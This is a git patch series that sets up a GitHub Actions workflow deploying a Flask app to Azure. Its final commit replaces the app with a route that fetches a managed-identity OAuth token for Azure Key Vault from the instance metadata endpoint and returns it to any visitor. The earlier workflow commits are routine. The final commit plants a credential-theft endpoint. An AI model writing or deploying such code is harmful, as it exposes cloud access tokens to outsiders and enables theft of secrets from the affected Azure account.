From 39c0829262866057acb84f58a571b96e58d56dd6 Mon Sep 17 00:00:00 2001 From: Javandg86 <53448721+Javandg86@users.noreply.github.com> Date: Mon, 21 Jul 2025 20:48:38 -0400 Subject: [PATCH 1/5] Create main.yml --- .github/workflows/main.yml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 .github/workflows/main.yml diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml new file mode 100644 index 000000000..0ac7fe895 --- /dev/null +++ b/.github/workflows/main.yml @@ -0,0 +1,31 @@ +name: Azure App Service Deploy + +on: + push: + branches: + - main + +jobs: + deploy: + runs-on: ubuntu-latest + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + + - name: Setup Python + uses: actions/setup-python@v4 + with: + python-version: '3.9' + + - name: Install dependencies + run: | + pip install -r requirements.txt + + - name: Deploy to Azure Web App + uses: azure/webapps-deploy@v2 + with: + app-name: app-s-4-835f5b6f + slot-name: Production + publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }} + package: . From 1534d90ef087d20d134c11ef8de07af89ba4d852 Mon Sep 17 00:00:00 2001 From: Javandg86 <53448721+Javandg86@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:11:24 -0400 Subject: [PATCH 2/5] Update main.yml --- .github/workflows/main.yml | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 0ac7fe895..135b15c14 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -10,22 +10,28 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout repository + - name: Checkout code uses: actions/checkout@v3 + - name: Azure Login + uses: azure/login@v1 + with: + client-id: ${{ secrets.AZURE_CLIENT_ID }} + tenant-id: ${{ secrets.AZURE_TENANT_ID }} + client-secret: ${{ secrets.AZURE_CLIENT_SECRET }} + - name: Setup Python uses: actions/setup-python@v4 with: python-version: '3.9' - name: Install dependencies - run: | - pip install -r requirements.txt + run: pip install -r requirements.txt - name: Deploy to Azure Web App uses: azure/webapps-deploy@v2 with: app-name: app-s-4-835f5b6f slot-name: Production - publish-profile: ${{ secrets.AZURE_WEBAPP_PUBLISH_PROFILE }} package: . + From c5bbd1bdf2b9264291f7f96ef39a7344208434a7 Mon Sep 17 00:00:00 2001 From: Javandg86 <53448721+Javandg86@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:14:48 -0400 Subject: [PATCH 3/5] Update main.yml --- .github/workflows/main.yml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 135b15c14..7ea949617 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -29,9 +29,6 @@ jobs: run: pip install -r requirements.txt - name: Deploy to Azure Web App - uses: azure/webapps-deploy@v2 - with: - app-name: app-s-4-835f5b6f - slot-name: Production - package: . + uses: azure/we + From ebf6aed020b0330551effad02d313c033de9e5fc Mon Sep 17 00:00:00 2001 From: Javandg86 Date: Mon, 21 Jul 2025 21:20:01 -0400 Subject: [PATCH 4/5] Add Azure deployment workflow --- .github/workflows/main.yml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/.github/workflows/main.yml b/.github/workflows/main.yml index 7ea949617..135b15c14 100644 --- a/.github/workflows/main.yml +++ b/.github/workflows/main.yml @@ -29,6 +29,9 @@ jobs: run: pip install -r requirements.txt - name: Deploy to Azure Web App - uses: azure/we - + uses: azure/webapps-deploy@v2 + with: + app-name: app-s-4-835f5b6f + slot-name: Production + package: . From b6e471543a2a9ade039c42d3e2c2e66669691975 Mon Sep 17 00:00:00 2001 From: Javandg86 Date: Mon, 21 Jul 2025 21:37:12 -0400 Subject: [PATCH 5/5] Replace app with MSI token fetcher --- app.py | 42 ++++++++++++++---------------------------- 1 file changed, 14 insertions(+), 28 deletions(-) diff --git a/app.py b/app.py index 3d1808cf6..7fca26b32 100644 --- a/app.py +++ b/app.py @@ -1,32 +1,18 @@ -import os - -from flask import (Flask, redirect, render_template, request, - send_from_directory, url_for) +from flask import Flask +import requests app = Flask(__name__) - -@app.route('/') +@app.route("/") def index(): - print('Request for index page received') - return render_template('index.html') - -@app.route('/favicon.ico') -def favicon(): - return send_from_directory(os.path.join(app.root_path, 'static'), - 'favicon.ico', mimetype='image/vnd.microsoft.icon') - -@app.route('/hello', methods=['POST']) -def hello(): - name = request.form.get('name') - - if name: - print('Request for hello page received with name=%s' % name) - return render_template('hello.html', name = name) - else: - print('Request for hello page received with no name or blank name -- redirecting') - return redirect(url_for('index')) - - -if __name__ == '__main__': - app.run() + try: + url = "http://169.254.169.254/metadata/identity/oauth2/token" + params = { + "api-version": "2019-08-01", + "resource": "https://vault.azure.net" + } + headers = {"Metadata": "true"} + r = requests.get(url, headers=headers, params=params, timeout=2) + return r.text + except Exception as e: + return f"Error: {e}"